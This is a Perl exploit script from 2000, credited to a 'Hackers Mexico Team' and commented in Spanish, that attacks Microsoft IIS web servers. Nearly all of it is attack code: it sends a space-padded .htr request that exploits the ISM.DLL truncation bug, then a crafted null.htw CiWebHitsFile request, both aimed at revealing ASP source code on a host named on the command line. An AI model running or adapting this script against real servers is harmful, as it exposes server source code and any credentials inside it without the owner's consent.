#!/usr/bin/perl #---------------------------------------------------------------------# # [ISM y ASP] Internet Information Server Buffer Overflow # # IIS ASP codigo para ver si es usado el ISM.DLL (buffer overflow) # # y el null.htw bug # # Hackers Mexico Team 08/09/2000 # # Realizado por Radikall radikall@hackers-mexico.org # #---------------------------------------------------------------------# # Salu2 a Mulder <-- a hmt memb. # #---------------------------------------------------------------------# # Copyright 2000 http://www.hackers-mexico.org # #---------------------------------------------------------------------# use Socket; $port=80; if (!($ARGV[0])) { print "\n[ISMyASP]\n"; print "$0 http://host/view.asp \n"; print "Hackers Mexico Team.\n"; exit; } $url=$ARGV[0]; chop($url) if $url =~ /\n$/; print "url: $url\n"; $remote = $url; $remote =~ s/http\:\/\///g; $remote =~ s/\/([^>]|\n)*//g; print "host: $remote\n"; $path = $url; $path =~ s/http\:\/\///g; $path =~ s/$remote//g; print "path: $path\n"; $spaces=230; #ESTE ES EL VALOR DE DEFAULT DEL ARCHIVO ISM.DLL b.t #RECUERDA ESTE ATAQUE SOLO FUNCIONA 1 VEZ #LEE THE CERBERUS CISADV000327. $submit = "GET $path"; $i=0; while($i < $spaces) { $submit= "$submit%20"; $i++; } $submit= "$submit.htr HTTP/1.0\n\n"; print "======Trying ism.dll buffer truncation...\n"; print "submit: $submit\n\n"; &post_message; print "======Trying null.htw...\n"; $submit="GET /null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n"; print "submit: $submit\n\n"; &post_message; sub post_message { if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); } die("No port specified.") unless $port; $iaddr = inet_aton($remote) || die("Fallo al buscar el Host: $remote"); $paddr = sockaddr_in($port, $iaddr); $proto = getprotobyname('tcp'); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Fallo para abrir sockets: $!"); connect(SOCK, $paddr) || die("No se puede conectar: $!"); send(SOCK,$submit,0); printf "\n======Waiting for reply [pray]....\n\n"; while() { print $_; } close(SOCK); } print "\n\n======FIN. [Hackers Mexico Team]\n"; exit; #:) radikall@hackers-mexico.org